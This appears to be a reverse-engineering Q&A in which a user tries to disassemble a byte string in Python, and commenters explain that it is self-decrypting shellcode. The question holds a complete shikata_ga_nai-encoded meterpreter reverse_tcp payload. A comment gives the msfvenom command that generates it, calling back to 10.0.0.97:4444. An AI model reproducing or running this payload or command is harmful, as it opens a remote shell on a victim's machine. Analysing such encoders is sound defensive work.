# using dis to disassemble opcodes

Tags: reverse-engineering, cpython

Basically I want to disassemble a bunch of opcodes using cpython.

I have the following opcodes:

```
data = b"\xdb\xda\xbb\x04\xd7\x03\xf9\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x56\x31\x5f\x18\x03\x5f\x18\x83\xc7\x00\x35\xf6\x05\xe0\x3b\xf9\xf5\xf0\x5b\x73\x10\xc1\x5b\xe7\x50\x71\x6c\x63\x34\x7d\x07\x21\xad\xf6\x65\xee\xc2\xbf\xc0\xc8\xed\x40\x78\x28\x6f\xc2\x83\x7d\x4f\xfb\x4b\x70\x8e\x3c\xb1\x79\xc2\x95\xbd\x2c\xf3\x92\x88\xec\x78\xe8\x1d\x75\x9c\xb8\x1c\x54\x33\xb3\x46\x76\xb5\x10\xf3\x3f\xad\x75\x3e\x89\x46\x4d\xb4\x08\x8f\x9c\x35\xa6\xee\x11\xc4\xb6\x37\x95\x37\xcd\x41\xe6\xca\xd6\x95\x95\x10\x52\x0e\x3d\xd2\xc4\xea\xbc\x37\x92\x79\xb2\xfc\xd0\x26\xd6\x03\x34\x5d\xe2\x88\xbb\xb2\x63\xca\x9f\x16\x28\x88\xbe\x0f\x94\x7f\xbe\x50\x77\xdf\x1a\x1a\x95\x34\x17\x41\xf1\xf9\x1a\x7a\x01\x96\x2d\x09\x33\x39\x86\x85\x7f\xb2\x00\x51\xf6\xd4\xb2\x8d\xb0\xb5\x4c\x2e\xc0\x9c\x8a\x7a\x90\xb6\x3b\x03\x7b\x47\xc3\xd6\x11\x4d\x53\xd3\xe5\x51\xc2\x8b\xe7\x51\x15\x10\x6e\xb7\x45\xf8\x20\x68\x26\xa8\x80\xd8\xce\xa2\x0f\x06\xee\xcc\xda\x2f\x85\x22\xb2\x18\x32\xda\x9f\xd3\xa3\x23\x0a\x9e\xe4\xa8\xbe\x5e\xaa\x58\xcb\x4c\xdb\x3e\x33\x8d\x1c\xab\x33\xe7\x18\x7d\x64\x9f\x22\x58\x42\x00\xdc\x8f\xd1\x47\x22\x4e\xe3\x3c\x15\xc4\x4b\x2b\x5a\x08\x4b\xab\x0c\x42\x4b\xc3\xe8\x36\x18\xf6\xf6\xe2\x0d\xab\x62\x0d\x67\x1f\x24\x65\x85\x46\x02\x2a\x76\xad\x10\x2d\x88\x33\x3f\x96\xe0\xcb\x7f\x26\xf0\xa1\x7f\x76\x98\x3e\xaf\x79\x68\xbe\x7a\xd2\xe0\x35\xeb\x90\x91\x4a\x26\x74\x0f\x4a\xc5\xad\xa0\x31\xa6\x52\x41\xc6\xae\x36\x42\xc6\xce\x48\x7f\x10\xf7\x3e\xbe\xa0\x4c\x30\xf5\x85\xe5\xdb\xf5\x9a\xf6\xc9"
```

I would like to disassemble this. I tried using `Cs` but sometimes Cs cannot disassemble all of the opcodes, I.e in above `Cs` fails on `\xf0` or `\xf0\x5b\x73\x10`. Below is how I use `Cs` module:

```
md = Cs(CS_ARCH_X86, CS_MODE_64)
md.detail = True
for i in md.disasm(data, dataLength):
    print(i)
```

So, I thought that `Cs` is not that intelligent to disassemble all. Otherwise please tell me what is wrong here?

I looked around trying to find an alternative better python module that could disassemble the opcodes, and the first results were using module `dis`. Reading through the documentation, I could'nt find an example to disassemble a bunch of opcodes. All I found was to disassemble a function. Can anyone tell me how to disassemble using `dis`? or is there any better disassembling module.

Comment: Are you sure that is supposed to be x86-64 machine code?  I ran it through `ndisasm -b 64` and the resulting assembly is nonsensical.

Comment: For instance `f0` is the `lock` prefix, and `5b` is `pop rbx`, which does not allow the `lock` prefix, so this is an invalid instruction and would `#UD` if executed.

Comment: well this a shellcode obtained using msfvenom as following: `msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.97 lport=4444 -f c -e x86/shikata_ga_nai`

Comment: Oh, `shikata_ga_nai` is an encoder, see https://www.boozallen.com/insights/cyber/shellcode/shikata-ga-nai-encoder.html.  It encrypts most of the shellcode in such a way that it decrypts itself (self-modifying code) as it executes.  So in fact only the first few bytes are valid instructions as they stand.  The rest is invalid code that will be transformed into valid code as it runs.  But the whole point of this is to defeat a naive attempt to disassemble the shellcode, so of course your attempt doesn't work.

Comment: So first of all, it appears to be 32-bit code, not 64-bit.  Now the first `0x16` bytes are valid instructions.  The first few use FPU tricks to get the address of the shellcode into `edi`, and the initial value of the key, `0xf903d704` into `ebx`.  Then there's a loop to decrypt the rest of the code.  Part of the decryption loop is itself encrypted.  After reversing this, the main loop goes `decrypt_loop: xor [edi+0x18], ebx ; add ebx, [edi+0x18] ; add edi, 4 ; loop decrypt_loop ; cld`.  You could do this decryption yourself in Python and then disassemble the result.